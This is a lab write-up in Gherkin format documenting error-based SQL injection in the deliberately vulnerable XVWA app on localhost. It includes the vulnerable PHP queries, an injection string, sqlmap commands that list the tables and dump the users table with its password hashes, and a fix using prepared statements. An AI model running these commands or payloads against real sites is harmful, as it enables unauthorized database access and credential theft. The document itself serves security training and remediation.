## Version 1.4.1
## language: en

Feature:
  TOE:
    xvwa
  Category:
    SQL Injection – Error Based
  Location:
    http://localhost:80/xvwa/vulnerabilities/sqli TCP
  CWE:
    CWE-89: https://cwe.mitre.org/data/definitions/89.html
    CWE-564: https://cwe.mitre.org/data/definitions/564.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to SQL Injection  Error Based
  Recommendation:
    Use parameterized requests

  Background:
    Hacker's software:
    | <Software name>                  | <Version>     |
    | Windows 10                       | 1809          |
    | Google Chrome                    | 75.0.3770.100 |
    | Windows Subsystem for Linux      | 1             |
    | Sqlmap                           | 1.3.4         |
    | Burp                             | 2.1           |
  TOE information:
    Given I am accessing the site http://localhost:80/xvwa
    And entered /vulnerabilities/sqli/
    And the server is running MySQL version 5.0
    And PHP version 7.3.7

  Scenario: Normal use case
    When I search for a coffee
    Then the site list all coffees which partially match the search parameter
    When select a item
    Then the site return the info this

  Scenario: Static detection
    When I look at the code of file xvwa\vulnerabilities\sqli\home.php
    """
    48 $item = isset($_POST['item']) ? $_POST['item'] : '';
    49 $search = isset($_POST['search']) ? $_POST['search'] : '';
    """
    Then I can see that the user input is not filtered
    When I see this the next lines:
    """
    56 $sql = "select * from caffaine where itemid = ".$item;
    60 $sql = "SELECT * FROM caffaine WHERE itemname LIKE '%"
     . $search . "%' OR itemdesc LIKE '%" . $search . "%' OR
      categ LIKE '%" . $search . "%'";
    """
    Then I can see that queries are made with unfiltered data
    Then I can conclude that there are no safe queries

  Scenario: Dynamic detection
    When I see how the requests are made
    """
    POST http://localhost:80/xvwa/vulnerabilities/sqli/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    item=&search=amer
    """
    Then I can see who the request can vulnerable
    When I execute the following command in sqlmap:
    """
    $ sqlmap -u "http://localhost:80/xvwa/vulnerabilities/sqli/"
     --data="search=Bicerin"
    """
    Then I get the output:
    """
     POST parameter 'search' is vulnerable
    """
    Then I can conclude that the site is susceptible to Sql injection

  Scenario: Exploitation
    When I entered the following string in the search bar
    """
    ' and 1= '1'
    """
    Then the site show:
    """
    Fatal error: Uncaught mysqli_sql_exception:
    You have an error in your SQL syntax;
    check the manual that corresponds to your MariaDB server
    version for the right syntax to use near
    '1'%' OR categ LIKE '%' and 1= '1'%'' at line 1 [evidence](image4.png)
    """
    When I execute the following command in sqlmap:
    """
    $ sqlmap -u "http://localhost:80/xvwa/vulnerabilities/sqli/"
     --data="search=Bicerin" --tables
    """
    Then I get the all tables of the database:
    """
    +----------------------------------------------------+
    | caffaine                                           |
    | comments                                           |
    | users                                              |
    +----------------------------------------------------+
    """
    When I execute the following command in sqlmap:
    """
    $ sqlmap -u "http://localhost:80/xvwa/vulnerabilities/sqli/"
     --data="search=Bicerin" --dump -T users
    """
    Then I get all data of users table:
    """
    +-----+----------+----------------------------------+
    | uid | username | password                         |
    +-----+----------+----------------------------------+
    | 1   | admin    | 21232f297a57a5a743894a0e4a801fc3 |
    | 2   | xvwa     | 570992ec4b5ad7a313f5dc8fd0825395 |
    | 3   | user     | 25890deab1075e916c06b9e1efc2e25f |
    +-----+----------+----------------------------------+
    """
    Then I can conclude that the vulnerability has been exploited

  Scenario: Remediation
    To solve this vulnerability, use parameterized queries:
    """
     56 $sql = mysqli_prepare( $conn,"select * from
      caffaine where itemid = ? ");
     57 mysqli_stmt_bind_param($sql, 'i', $item);
     58 mysqli_stmt_execute($sql);
     62 $sql = mysqli_prepare($conn, "SELECT * FROM caffaine WHERE
      itemname LIKE CONCAT('%',?,'%')  OR itemdesc LIKE CONCAT('%',?,'%')
      OR categ LIKE CONCAT('%',?,'%')");
     63 $sql -> bind_param('sss', $search,$search,$search );
     64 mysqli_stmt_execute($sql);
     65 $result = $sql -> get_result();
    """
    When I entered the following string in the search bar
    """
    ' and 1= '1'
    """
    Then the request does not return anything
    When I make the following request
    """
    POST http://localhost:80/xvwa/vulnerabilities/sqli/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    item=2 or 1=1&search=
    """
    Then the request only returns an object
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.7/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.7/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-07-12
